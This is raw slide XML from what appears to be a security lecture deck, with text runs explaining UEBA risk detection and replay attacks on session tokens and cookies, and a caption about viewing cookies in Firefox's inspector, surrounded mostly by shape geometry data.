                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>signature</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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60">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>creation	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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0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30">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>User</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-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0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35">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Entity</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-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50">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Behavior</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-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20">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Analytics</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-4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80">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>(UEBA)</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-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50">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>are</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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45">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>used </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5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12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0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60">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>detect</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-4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20">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>risks.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98056" y="306451"/>
            <a:ext cx="265811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30">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Replay</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-13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70">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Attacks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0764" y="1882292"/>
            <a:ext cx="11609070" cy="13093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replay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attack</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-13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works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by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sniffing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guessing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token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value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then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submitting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70">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>re- </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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establish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session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illegitimately.</a:t>
            </a:r>
            <a:endParaRPr sz="2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1395"/>
              </a:spcBef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replays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cookie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obtain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authenticated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session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secure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them.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63640" y="760476"/>
            <a:ext cx="3707891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065970" y="3401186"/>
            <a:ext cx="10303510" cy="4647565"/>
            <a:chOff x="3065970" y="3401186"/>
            <a:chExt cx="10303510" cy="464756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75431" y="3410711"/>
              <a:ext cx="10283952" cy="462838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070732" y="3405949"/>
              <a:ext cx="10293985" cy="4638040"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="10293985" h="4638040">
                  <a:moveTo>
                    <a:pt x="0" y="4637913"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="10293477" y="4637913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10293477" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="4637913"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="D7D7D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3186810" y="8432089"/>
            <a:ext cx="987488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40">
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="-90">
                <a:solidFill>
                  <a:srgbClr val="3B404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20">
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>screenshot</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="-110">
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>here</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="-80">
                <a:solidFill>
                  <a:srgbClr val="3B404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20">
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>shows</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="-100">
                <a:solidFill>
                  <a:srgbClr val="3B404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5">
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>how</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="-90">
                <a:solidFill>
                  <a:srgbClr val="3B404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25">
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="-65">
                <a:solidFill>
                  <a:srgbClr val="3B404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5">
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>view</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="-105">
                <a:solidFill>
                  <a:srgbClr val="3B404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35">
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="-95">
                <a:solidFill>
                  <a:srgbClr val="3B404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25">
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>set</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="-95">
                <a:solidFill>
                  <a:srgbClr val="3B404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25">
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>by</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="-70">
                <a:solidFill>
                  <a:srgbClr val="3B404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30">
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Google's</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="-100">
                <a:solidFill>
                  <a:srgbClr val="3B404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5">
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>home</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="-100">
                <a:solidFill>
                  <a:srgbClr val="3B404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30">
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>page</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="-85">
                <a:solidFill>
                  <a:srgbClr val="3B404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45">
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>using</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="-105">
                <a:solidFill>
                  <a:srgbClr val="3B404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5">
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="-70">
                <a:solidFill>
                  <a:srgbClr val="3B404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40">
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Firefox</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="-85">
                <a:solidFill>
                  <a:srgbClr val="3B404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5">
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>browser's</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="-114">
                <a:solidFill>
                  <a:srgbClr val="3B404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25">
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>inspector</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="-95">
                <a:solidFill>
                  <a:srgbClr val="3B404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40">
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>tools.</a:t>
            </a:r>
            <a:endParaRPr sz="1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10155" y="3018535"/>
            <a:ext cx="3822700" cy="4551680"/>
            <a:chOff x="2010155" y="3018535"/>
            <a:chExt cx="3822700" cy="4551680"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="object 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2010155" y="3831335"/>
              <a:ext cx="2903220" cy="2905125"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2903220" h="2905125">
                  <a:moveTo>
                    <a:pt x="1451609" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1403691" y="776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1356160" y="3089"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1309042" y="6914"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1262361" y="12229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1216139" y="19008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1170401" y="27229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1125172" y="36866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1080474" y="47897"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1036332" y="60296"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="992770" y="74042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="949811" y="89108"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="907480" y="105472"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="865800" y="123109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="824795" y="141996"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="784490" y="162109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="744907" y="183423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="706072" y="205916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="668007" y="229562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="630737" y="254338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="594286" y="280220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="558678" y="307185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="523936" y="335208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="490084" y="364265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457147" y="394332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425148" y="425386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="394111" y="457402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="364060" y="490358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="335019" y="524227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="307012" y="558988"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="280062" y="594616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="254194" y="631086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="229432" y="668375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="205799" y="706460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183319" y="745316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="162016" y="784919"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="141915" y="825245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123039" y="866271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="105411" y="907973"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89057" y="950326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73999" y="993306"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60262" y="1036890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47869" y="1081055"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36845" y="1125775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27213" y="1171027"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18997" y="1216787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12222" y="1263031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6910" y="1309736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3087" y="1356877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="775" y="1404430"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1452372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="775" y="1500313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3087" y="1547866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6910" y="1595007"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12222" y="1641712"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18997" y="1687956"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27213" y="1733716"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36845" y="1778968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47869" y="1823688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60262" y="1867853"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73999" y="1911437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89057" y="1954417"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="105411" y="1996770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123039" y="2038472"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="141915" y="2079498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="162016" y="2119824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183319" y="2159427"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="205799" y="2198283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="229432" y="2236368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="254194" y="2273657"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="280062" y="2310127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="307012" y="2345755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="335019" y="2380516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="364060" y="2414385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="394111" y="2447341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425148" y="2479357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457147" y="2510411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="490084" y="2540478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="523936" y="2569535"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="558678" y="2597558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="594286" y="2624523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="630737" y="2650405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="668007" y="2675181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="706072" y="2698827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="744907" y="2721320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="784490" y="2742634"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="824795" y="2762747"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="865800" y="2781634"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="907480" y="2799271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="949811" y="2815635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="992770" y="2830701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1036332" y="2844447"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1080474" y="2856846"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1125172" y="2867877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1170401" y="2877514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1216139" y="2885735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1262361" y="2892514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1309042" y="2897829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1356160" y="2901654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1403691" y="2903967"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1451609" y="2904744"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1499528" y="2903967"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1547059" y="2901654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1594177" y="2897829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1640858" y="2892514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1687080" y="2885735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1732818" y="2877514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1778047" y="2867877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1822745" y="2856846"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1866887" y="2844447"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1910449" y="2830701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1953408" y="2815635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1995739" y="2799271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2037419" y="2781634"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2078424" y="2762747"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2118729" y="2742634"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2158312" y="2721320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2197147" y="2698827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2235212" y="2675181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2272482" y="2650405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2308933" y="2624523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2344541" y="2597558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2379283" y="2569535"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2413135" y="2540478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2446072" y="2510411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2478071" y="2479357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2509108" y="2447341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2539159" y="2414385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2568200" y="2380516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2596207" y="2345755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2623157" y="2310127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2649025" y="2273657"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2673787" y="2236368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2697420" y="2198283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2719900" y="2159427"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2741203" y="2119824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2761304" y="2079498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2780180" y="2038472"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2797808" y="1996770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2814162" y="1954417"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2829220" y="1911437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2842957" y="1867853"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2855350" y="1823688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2866374" y="1778968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2876006" y="1733716"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2884222" y="1687956"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2890997" y="1641712"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2896309" y="1595007"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2900132" y="1547866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2902444" y="1500313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2903220" y="1452372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2902444" y="1404430"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2900132" y="1356877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2896309" y="1309736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2890997" y="1263031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2884222" y="1216787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2876006" y="1171027"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2866374" y="1125775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2855350" y="1081055"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2842957" y="1036890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2829220" y="993306"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2814162" y="950326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2797808" y="907973"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2780180" y="866271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2761304" y="825245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2741203" y="784919"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2719900" y="745316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2697420" y="706460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2673787" y="668375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2649025" y="631086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2623157" y="594616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2596207" y="558988"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2568200" y="524227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2539159" y="490358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2509108" y="457402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2478071" y="425386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2446072" y="394332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2413135" y="364265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2379283" y="335208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2344541" y="307185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2308933" y="280220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2272482" y="254338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2235212" y="229562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2197147" y="205916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2158312" y="183423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2118729" y="162109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2078424" y="141996"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2037419" y="123109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1995739" y="105472"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1953408" y="89108"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1910449" y="74042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1866887" y="60296"/>
                  </a:lnTo>
                  <a:lnTo>
